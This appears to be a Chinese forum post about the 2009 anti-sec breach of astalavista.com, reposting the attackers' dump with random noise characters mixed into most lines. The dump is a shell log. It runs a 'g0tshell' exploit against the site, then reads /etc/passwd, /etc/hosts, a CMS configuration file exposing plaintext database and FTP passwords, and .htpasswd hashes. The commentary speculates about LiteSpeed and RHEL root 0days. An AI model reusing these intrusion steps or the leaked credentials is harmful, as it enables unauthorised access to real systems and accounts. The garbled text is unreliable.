里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 e: h3 A9 `) x0 W' a. T/ N {1 G
+ N7 [. G4 ]# ?+ R( K3 r- ][root@front3 ~]# curl -I litespeedtech.com
9 F5 Y0 x/ r& C9 O5 c z( d4 xHTTP/1.1 200 OK
1 M5 N: a/ h9 b7 ?Date: Fri, 05 Jun 2009 22:54:51 GMT
! e3 c* K& @0 B- CServer: LiteSpeed
+ y& y. i2 L4 T, |. g
9 u6 ?7 v- P& M另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-3 \+ |' G: U4 Y I* h
. ]1 A$ e; F3 i) Z" H% N9 |2 W, j有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
; k- M: T. P* [! m& h% ~+ |' N/ f& E3 x9 V1 n4 {9 L# q
& U0 j0 L; t7 K. L/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
2 r$ _- p g" y. n2 y/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \- C1 Z: l! r% L( ~* |9 [
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
: y0 Z" M4 C; t+ T- Q0 M9 P\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
- p; k. f/ h/ ` \/ \/ \/ \/ \/ \/ \/
1 U+ x5 y5 ?! C* I The Hacking & Security Community H; [8 B* C" H/ S7 R; h% G
[+] Founded in 1997 by a hacker computer enthusiast M* E. l" l! |: P. e4 V% k
[-] Exposed in 2009 by anti-sec group
" @( B* J& B9 |: C5 M
' n5 k" Y& I. t% H OFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:0 W& A+ r2 `5 X0 x# ]2 @
>> 03. Who’s behind the site?5 [0 |8 e. I4 Q, D
>>2 f/ `7 U8 h2 ?2 ^* |
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
/ f/ @3 H& a: z+ f$ x( |- `$ L: x1 A: g' }8 c# y' u
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?1 H+ n* T; c) N
>>
3 ]9 {* h7 i' I% \>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and$ `5 b& B- t0 D+ k' o
military institutions.
! ]7 L9 V" E' m>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.4 v& L8 f1 l; Q: Q' S6 {
1 r. L9 M! e' ]1 @
Why has Astalavista been targeted?; {% U- S9 {! s6 g
8 | ~% i. m* L3 S% }1 e" bOther than the fact that they are not doing any of this for the “community” but" I U/ y( }% n3 |; @# A
for the money, they spread exploits for kids, claim to be a security community& b8 c% Y+ T+ o
(with no real sense of security on their own servers), and they charge you $6.66( W) Z. w- _; L a( }3 k$ J
per months to access a dead forum with a directory filled with public releases
; u( C% K9 Y4 Z& K! h- p3 R; E" rand outdated / broken services.- o( I! V5 E; L) N$ u& i
0 \# P6 k5 M* s, D4 U4 w0 o; {3 R
We wanted to see how good that “team of security and IT professionals” really is.( Y1 W. r9 Q+ z
% Z9 P/ j r' d/ n$ ALet’s begin.7 l1 O) G1 e- E# L
* ]& L4 o( s( }, o9 B; X0 kanti-sec:~# ./g0tshell astalavista.com -p 80
9 J* k2 a- f3 ]1 S4 ] \9 x4 L[+] Connecting to astalavista.com:80
) c( p7 i+ V' a" c# I1 d[+] Grabbing banner…
9 K& c8 i' E) V5 [8 l# pLiteSpeed* g5 `* D% J5 ?* w) e; ?" c5 b7 R
[+] Injecting shellcode…
) s3 H2 A5 O5 J+ R' G7 E[-] Wait for it
8 Y! K, m9 e6 C# ~( T; b
$ E- `# o! d [; p# x5 S[~] We g0tshell H3 i8 I' E }
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
( l* e7 M- X/ D5 C0 b7 {ID: uid=100(apache) gid=500(apache) groups=500(apache)* k4 z- ^" M' W. n9 v5 i
' c6 Q3 V! n- T% ksh-3.2$ cat /etc/passwd
- ^& y& P) _2 h' qroot:x:0:0:root:/root:/bin/bash
0 J, U3 B' |7 B& D; Z4 \1 G* O0 `bin:x:1:1:bin:/bin:/sbin/nologin( a# j0 T- a4 H4 @2 W
daemon:x:2:2:daemon:/sbin:/sbin/nologin
2 g! I1 T2 u3 C+ r3 n" yadm:x:3:4:adm:/var/adm:/sbin/nologin: ]6 g2 z& |' A4 G8 ^
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin m: e' y5 \8 U: e9 h
sync:x:5:0:sync:/sbin:/bin/sync
8 q# g: o; N/ ?2 P$ y) C6 ?& qshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown) Q" Z0 p% a, Y& V" v- q3 Z
halt:x:7:0:halt:/sbin:/sbin/halt
3 k0 `* g) M7 zmail:x:8:12:mail:/var/spool/mail:/sbin/nologin5 l3 u4 m# x. P( u
news:x:9:13:news:/etc/news:1 r7 u! O! I4 i0 G2 \) w+ l9 J
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
. s7 {) G5 N z9 j9 `operator:x:11:0 perator:/root:/sbin/nologin! {0 c1 D! o' N0 G
games:x:12:100:games:/usr/games:/sbin/nologin
; ]2 R5 ? G. v) W1 Q! lgopher:x:13:30:gopher:/var/gopher:/sbin/nologin* Y6 \# Y' m. \( A! @5 H
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin0 C) ^% R. S0 g8 r
nobody:x:99:99:Nobody:/:/sbin/nologin
( W* g0 N! q- yrpm:x:37:37::/var/lib/rpm:/sbin/nologin
# S0 @4 ^3 N. O' w2 Z( bdbus:x:81:81:System message bus:/:/sbin/nologin. D, N- ?$ m/ Z* g, L1 ?
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin) ~; F( `( x+ F3 @# ?5 ]0 U" m( u
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin1 T% e% C# Z( X# \
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
, L, g. Z8 e ~4 ^' hvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin u" \+ l! q; M* _4 T. X" V
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin! z6 S* n, y& ^ Y8 S6 X T: r& l% Z
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
) k7 Q' j0 w. H x% m/ h: v g3 prpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin( p9 Z; @6 @7 I' }& |* |* x2 v
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
& F# `/ }! H1 t# u5 Tsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
/ ~ Y9 r2 W3 I1 q6 }. q; B- Opcap:x:77:77::/var/arpwatch:/sbin/nologin" y1 J( _! @) C
named:x:25:25:Named:/var/named:/sbin/nologin
) a( b2 }; g+ {! j' ~. S% `+ Xapache:x:100:500::/var/www:/bin/false
% H, S6 N4 K/ U1 Zdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
4 z$ a0 N x, ^; V, Wmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash; o3 ~1 n5 t' @4 w$ L% {, @
webapps:x:500:501::/var/www/html:/bin/bash
" R! h- C* [4 }+ Qmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash1 z3 l/ u% [, A9 ? q
admin:x:501:502::/home/admin:/bin/bash
0 l7 c' x6 T# Z( [8 Wjon:x:502:503::/home/jon:/bin/bash6 |" H7 S$ N/ t& z
com:x:503:504::/home/com:/bin/bash
2 G! r8 a# T0 u+ i; Wntp:x:38:38::/etc/ntp:/sbin/nologin3 b* U+ Y# M p! ~ z2 ?5 F
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin2 c. R& b8 R2 T& D* v3 j7 q
astanet:x:504:505::/home/astanet:/bin/bash) O4 p6 R% g Z1 H; l P3 t9 z
avahi:x:70:70:Avahi daemon:/:/sbin/nologin( X6 P* v) ]8 F5 l- R9 e
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
* j( m. x! `& _6 ~
9 \7 x5 V$ W+ U8 Qsh-3.2$ cat /etc/hosts
7 Y8 m2 a4 A* o5 m# Do not remove the following line, or various programs
( c4 p! v9 Q9 `$ w9 C3 E; b9 V% f# that require network functionality will fail.6 J! x2 K( M8 T$ V" {- k. r- F
127.0.0.1 localhost.localdomain localhost7 E% O% Y0 {( @' {( S$ ]
::1 localhost6.localdomain6 localhost6, x7 K" b1 `' r+ O* m% w
80.74.154.172 asta1.astalavistaserver.com/ A' z' u2 e/ n E0 S
3 |7 Q, V, }* o1 ]) ysh-3.2$ pwd
- E2 }4 K7 i. H( o2 k/home/com/public_html
3 D: x9 U4 N& z& C/ Z& K- _) E9 T7 M0 p; p/ Z% f
sh-3.2$ ls -la: f3 C; e `' k* h' i" ~: Y
total 18460# K$ g" s# W& q* o) ~. \- I& E1 w
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
0 W' t0 N. O: m) q" [* J! Odrwx–x–x 11 com com 4096 Jun 25 2008 ..1 U& J6 Q8 ]; C) q* e" `, `
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
: n/ u7 T; M. C4 D. adrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache8 s9 C8 B1 k' L$ Y! k
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
+ A( b$ @! L$ Z* V+ [drwxrwxrwx 2 com com 4096 May 19 00:50 config9 {' T' V S9 H9 Q0 f
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core& H" H: N) y6 Z; J d7 L6 N
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules( t4 ~/ S. S$ j @
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
0 n; Q; H4 C9 K9 ydrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo* k5 X- J0 q, T/ t
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__7 n: D$ ]/ M4 [; _+ T- ^* |
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
9 l! C6 G" P% V% f: }0 Rdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd9 |* R# y* O- K! d
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
' ^2 h1 I4 t( F' s-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
, c9 g& u1 {, B) ~# Sdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
. s, c5 J S* L5 U-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess' s2 h0 ^2 Q* q2 p% l" i
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak! E7 ^. x0 t& u/ @# ^
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
! i: o+ a, T w6 S! e) e) o, t7 j# Jdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
/ d3 p# O# x' W- k) q$ ~/ Y0 {drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
5 y+ T& z2 C2 D; F9 S-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
1 V3 F" M; n2 ^drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer1 U% F- m- g2 P, ^8 V
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
( K1 F- Z, G: @# O ? a, F0 Idrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
' Z/ C, c4 @9 o3 `5 @& Ddrwxrwxrwx 12 com com 4096 Jun 2 07:47 media: Q, w: T @% E% K' |0 U
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
6 C* l ^( J+ z) ^+ g: N; I6 u Tdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
1 G$ R: e8 ~; J* g5 Q- ?drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin2 C' L% ~$ h! z! H' G! t1 P& D
drwxrwxr-x 22 com com 4096 May 28 17:06 _new6 z# \9 N, q( L, N! Z
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
- q: z1 T( p8 O# d) c; qdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
5 n8 p2 `8 H/ t! e0 z' o. o% Xdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy- b$ W8 m- {# ^# P
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt; Q( m, p2 ~1 L
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml. \$ b, _# T) Q' u
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php4 B! x, ~9 ?7 }1 f3 K! K, y- t/ Y( _. j
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
! M% y. k# u* c6 ndrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
0 A& ^/ \3 `/ c2 jdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam ?4 ]$ _! o4 z8 H$ R( F
& ]9 s9 z/ n; N O$ s; _
sh-3.2$ head -20 index.php0 p8 b9 e, }' p3 P
<?php
* ]& m g( I# E2 s
: y" B. Q) q8 c# T8 ]4 D/**" {. {5 l e2 N1 g' V0 Y
* The main page for the CMS# c& Z4 @- s( ~" k$ U n" ~
* @copyright CONTREXX CMS - COMVATION AG
0 M9 d7 s- f* } W) z( n* @author Comvation Development Team1 B/ ?" W7 ?" B/ O
* @version v1.0.9.10.1 stable- r+ e* x8 F0 F$ X& {2 y2 @2 Z
* @package contrexx% \: y9 G9 i9 ^/ f# |
* @subpackage core
/ z5 u4 A+ a& M! m. e0 W0 I1 o2 M* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage% k% D& y# g, Z# D
* @since v0.0.0.0
, o r# r+ _6 U; j: ^0 ^* k6 P* @todo Capitalize all class names in project
5 `2 W1 j9 H9 g& c4 u# V* @uses /config/configuration.php' [6 ? R3 J9 ~1 q: N; @: g$ e
* @uses /config/settings.php
0 `+ V* t4 J" |# I4 ?, P* @* @uses /config/version.php3 |, u5 _* x3 @& _- X! z
* @uses /core/API.php
: x: ^/ U% k8 I7 t* @uses /core_modules/cache/index.class.php3 H# X2 ~$ ]! e/ M) E/ s
* @uses /core/error.class.php8 k3 U# y+ u% B
* @uses /core_modules/banner/index.class.php
1 O+ G' g' F4 Z1 Z; x" D; W( o1 T* @uses /core_modules/contact/index.class.php
9 \2 L- K2 B+ _$ N+ E2 ]0 p
0 o7 S3 U$ ~4 C+ O8 vsh-3.2$ cd config/
9 T6 r+ }; Z0 P+ t/ B4 }; Ksh-3.2$ ls -la
/ f5 e5 i3 ^8 M% A etotal 32
8 w1 n- m" ~1 x. N& edrwxrwxrwx 2 com com 4096 May 19 00:50 .
; o2 m! g) A! d1 I$ L6 ldrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
; d- z6 K3 i1 s9 e, a-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php5 e7 f+ {8 s4 S3 | _8 e
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php- p" y5 L: `1 A7 @
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
* l! T6 z3 z7 h-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php; O/ M- s5 y: Q2 c- {% ?
( R8 L3 ~! p( \ `' H' Q
sh-3.2$ cat configuration.php
b+ A* e+ B. y[snip]4 i2 |. s) B, J4 `' Z" F5 V+ t
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost' K {1 |4 z, c! T
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
- C/ ^! r0 x; @5 Q$ r$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
* X8 k5 s6 }6 n. l$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username& Z2 Y1 ^4 Q7 e6 l( D
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
" N! N- u( c8 o5 I$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
" z1 u9 B7 H7 ~ M2 Q9 \3 d; e/ C$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
* O/ j* i- f5 U* I[snip]
, z. Z" ?' N, U( l; C$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
7 |2 B2 o! k; A0 |$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
1 G0 Z; g2 t5 M, x& `$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost: a% ?) p, @+ l4 G D& D- C; G
$_FTPCONFIG['port'] = 21; // Ftp remote port
* r+ {7 E( w7 e r$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username: x/ _$ F- q" W7 S0 a; \+ }, F
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password: X) F7 D. c2 v' {% k. Z& P+ e0 b
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms- x! g8 H( n$ n; L6 U1 o
+ ^, J7 B' D$ o2 Xsh-3.2$ cd ..
/ T2 `/ j: X8 K# P0 h$ hsh-3.2$ cd dvd/8 U. ] Z9 Y: o$ _
sh-3.2$ ls -la: I4 o5 s' f) U0 X v% C
total 2913780
4 p' W, ^$ d/ `6 Y' V* Edrwxr-xr-x 2 com com 4096 Sep 9 2008 .
+ a% X; C$ _7 |/ ndrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
8 l& R# G& Y u# H; Y7 a2 F, I-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar/ K8 t1 G' f6 O# W$ v
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar5 y& N3 L5 g" T+ A- Y! M! G
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar* |. @+ H& C- |! |) K$ }0 q
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess( a5 y) Z* b4 g$ L1 M
: A0 J/ ]( f# X l, \% H/ [sh-3.2$ cat .htaccess2 y. h3 z- D) Z5 V4 |- b/ h" R
authType Basic6 `) h- s7 O& D% M7 F7 ~3 O
authName DVD8 v& q* I; t/ `. D" }
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd' }6 I1 Q# {, b! o2 C( |8 b- a/ f
require valid-user
/ W& Q. |( @! v) D
9 z5 l/ L% j8 N% Csh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
/ H/ T5 {0 ?* X( C- x! E+ e- _DVDdownload:CRD8cuY6.MPT6
" A* x( W2 J8 b5 g& B+ DDVDdownload2:CR8a36.wluFMg
3 w: l& q" ?6 d' N4 S: C8 M0 F0 V
sh-3.2$ cat test.php
( ^* ?" s! L& A3 E4 E8 x: \<?php
- }, d$ b7 F: }: Y; u0 Y' L$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
5 o9 y* w' b4 H" f$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
1 }, R0 `1 {5 e% d5 Secho $url;
+ _# p- _' F" H5 Z9 e8 @ g?>, O' }+ o, u: H6 R8 C; y
$ b3 f7 I0 L" @* x1 y& ?/ @' T! n
sh-3.2$ cd modifications/* n2 q& D$ ~! b0 o6 R- n# e
sh-3.2$ ls -la2 s6 ^: _5 A) g S8 W
total 32
, p9 H. i5 u8 w F) Idrwxr-xr-x 8 com com 4096 May 11 12:48 .5 ^+ C' o' u- A' h6 V8 K
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 V" o7 ?9 X2 d% E! p9 V
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng, r8 J9 \& D& ~5 C! K, |( Q# @- q7 |
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs, \5 h3 \# `- ?8 B5 D' ^
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools) n# U5 A/ W! d' G* L3 I- g( L/ o
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
}$ h% c4 Z' H- _) k* P7 f- rdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search7 q8 T u: T- r/ w
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
: C) g' t+ c9 m# ?/ n8 H% t/ C) T
sh-3.2$ ls -R- A0 a% l) U) P+ U
.:
7 m" A. j. ~- ?$ S0 W1 N1 \com_avtng cronjobs onlinetools pjirc search _tmp7 h, t& u1 ^# d3 l Z
* o1 N& q( B& `1 g! v2 ]6 G" p./com_avtng:
' _/ @: s1 W0 Cavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
2 p4 {4 D, `' p1 Y7 o* j
. ^1 b' }1 C) y, ]./com_avtng/scripts:
6 l! L4 v$ m5 U, d0 J- }popunder.js
6 M9 _' V- ^. _6 |# P; c+ q& |9 ]1 c1 L! w8 ?
./cronjobs:1 v) x& R+ [1 b
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp6 |3 p$ k* w5 B
( x3 r9 s# R& c: G" V
./cronjobs/tmp:
/ t; w' Q% j2 y# D) t! j3 H9 ]/ q# ~contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv+ g, Q/ k* C* X
& Y+ A: U( b- N, U./onlinetools:
$ z( v8 E% z9 n$ k& ]; L; w; V& J$ windex.php: g# j" r5 E5 s r
! Z# \$ m" Y; H./pjirc:
4 m0 v0 C0 ` Ia_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
1 b: R9 `0 n; }2 _% ^+ r! NAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
) _. O% o' S0 p1 _* c) x# Ebackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
' A4 z) C3 X" v0 x4 N, D3 X$ R4 w$ q, N8 c; A0 f
./pjirc/img:
& l& P5 p/ P, |2 qange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif Z" l; ~+ q9 f1 g) @ j
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
1 U& b L+ S4 U1 X1 m& Rverre-eau.gif6 N3 Y' |& h# h* ~ \4 T* O+ Z
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 1 C; n3 p' p* `9 v1 k9 ^5 I7 P
verre-vin.gif9 K% V# A& }5 v4 J! C k
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
& I9 X; |6 L! [% u- u0 Wbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif* {( M- E6 ?8 N4 O. T6 i7 \
/ A2 i9 A8 q5 Y& \* n- g+ g./pjirc/snd:$ Z5 e) M1 F, l3 J! t$ W
bell2.au ding.au) G# e" D4 ~; N9 x0 t7 W( d
& H4 m, J3 C* y: E6 S/ F4 w% v
./search:2 s- C9 p+ X; D
searchEngines.php search.php
& y* l" L% ~# M% I3 g+ j
4 D0 k* T, B% z, T: u1 k3 h./_tmp:
' T. n* f/ T9 {! G/ _: i: |defaultPorts.php defaultPorts.txt
* W7 A7 O( J& S! @! ^/ J. S6 g. i% ^+ O% E% V5 H% N" q
sh-3.2$ cd cronjobs/
. s" T- Y6 @0 ?sh-3.2$ cat exploits.php
: r' w; d% Q5 X" X# ^- V[snip]
, X+ e% @7 `0 L6 k( a$categories = array();
- M. m* a$ P' j; p8 I$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
) S! v8 z9 i- X) E8 r1 @$expolits = file($milw0rmFile);
5 f2 r3 o$ a k8 P" h( @1 Y h3 C1 x$comExploits = array();
) L8 B7 e6 [; ?4 j[snip]) w5 A6 t9 I3 x: J
// manage data) R( l `. v2 y& Z4 y2 u
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
7 h) D0 V T. W) ]& [. H2 i* h* \- f2 N4 f: c4 R
// get path and title
& I# ] D ] N8 h8 c! F; o $expolits[$x] = trim($expolits[$x]); f# \, G1 N1 h$ T
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
' c C9 P; N2 y) T" |& X $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
3 D2 Q, S+ L. i, G' P
4 L( m( u2 ]! S; i // check if file exists! w/ @$ J0 i) O9 `% A
if (file_exists($path)) {
# F* T! e, P9 Y3 Z* S
( d+ x" I. U' g+ Z. g/ q% z: k# A $text = file_get_contents($path);) `4 w2 ~" @4 h$ y* H! R
2 C6 y+ w! l) ?+ L // get content and date$ q4 D: {* a0 y) [( O, F/ p% Z4 k
//$text = htmlspecialchars($text, ENT_QUOTES);$ q' i+ O) P3 c0 A @/ s
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
% \8 y6 T4 y0 ?* o if ($tmptext != ”) {
3 N) A7 v: A; {; F1 l3 L% C8 D3 ` $text = $tmptext;
. j% M2 z5 l7 M/ M: M } else {
* k* P0 A+ L+ ^* f+ d $text = addslashes(htmlentities($text, ENT_QUOTES));& R! g6 w$ w: m
} w! k! y7 L! w) X
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
0 q! K4 ^6 U$ t/ g8 y2 b $tmp = explode('-', $date);6 Q+ ~$ \4 T9 a" ]6 ?* e
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
( C+ b) h0 b9 o% ` $cat = getCategory ($path);; l* G s) O3 m7 [% A
$ext = pathinfo(basename($path));
, v# g. U- _/ ~% n" I $ext = $ext['extension'];
7 X5 q7 z3 H L $qStr = ”1 n. z5 H7 y1 K
SELECT `id`
C" i6 ~( F5 b5 u FROM `contrexx_module_exploits`
! i: r: w$ M- e9 O( Q- b$ B WHERE `title` = ‘” . $title . “‘' p; L3 Q# V, t
AND `date` = ‘” . $date . “‘
/ z8 g2 p: m, d7 } “;
; k: I- P$ I# U8 d% G3 L9 ]( O2 J& Y echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;# r; N, i% x* z9 a8 }
$q = $_objDB->query($qStr);- f/ z) o2 f+ K; j3 J5 V2 U
+ |+ @! u ~9 O ^) ^* C0 u if ($q->numRows() == 0) {
6 e8 U+ F3 U& T5 j/ b! V
- t5 O4 v( E6 M9 E6 p- T // prepare array
% q' w2 ~1 j5 K! o $comExploits[$x]['date'] = $date;
' q! J0 A; m; M $comExploits[$x]['title'] = $title;5 e0 c9 K- I, b$ a8 }+ O* u( c4 F
$comExploits[$x]['author'] = ‘milw0rm’;0 F- ?( `* k; {3 a1 r4 k% D
$comExploits[$x]['text'] = $text;
/ q9 p) o" l) R$ n. K. z $comExploits[$x]['source'] = $ext;
( k; Y6 G/ M5 E# T% e2 T $comExploits[$x]['url1'] = ”;
/ Y b- ?' d. Z% {* t $comExploits[$x]['url2'] = ”;2 l6 _; ~* E& M1 w5 K* m
$comExploits[$x]['catid'] = $cat;2 [( c, j( ~2 E' A
$comExploits[$x]['lang'] = ‘2′;. I+ S4 b; I+ o& [2 E5 l) D
$comExploits[$x]['userid'] = ‘12′;
2 n2 \; q( J5 N5 E $comExploits[$x]['startdate'] = ‘0000-00-00′;7 J1 V& e( r0 b- x* b
$comExploits[$x]['enddate'] = ‘0000-00-00′;
" j8 P( U$ z4 F" X' P $comExploits[$x]['status'] = ‘1′;# ~3 `2 ]2 U* v$ [; o I, z) y! y
$comExploits[$x]['changelog'] = $date;
8 o) r1 \* i: Z7 ]. r
6 h* D6 x- e+ B }. b3 } j5 F6 \
[snip]
; U6 w+ D6 n3 \% L6 K $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>( g0 A7 o" Z! G8 i" U, o. ]
<rss version=”2.0″>' W+ \" v3 e- j* _) {. F1 U) T
<channel>3 {1 n- o0 S) {4 p' Y
<title>ASTALAVISTA.com - Exploits</title>
' W) d3 G' Y0 E7 j1 p! i! X. l0 |. `9 ] <link>http://www.astalavista.com/exploits</link>
. Q9 C( ~$ p) G2 v <description>All availably Exploits.</description>7 ^4 M& O( D% ~3 {5 P
<language>en-us</language>+ O, S% E0 n* B0 r. y- u* I8 Q
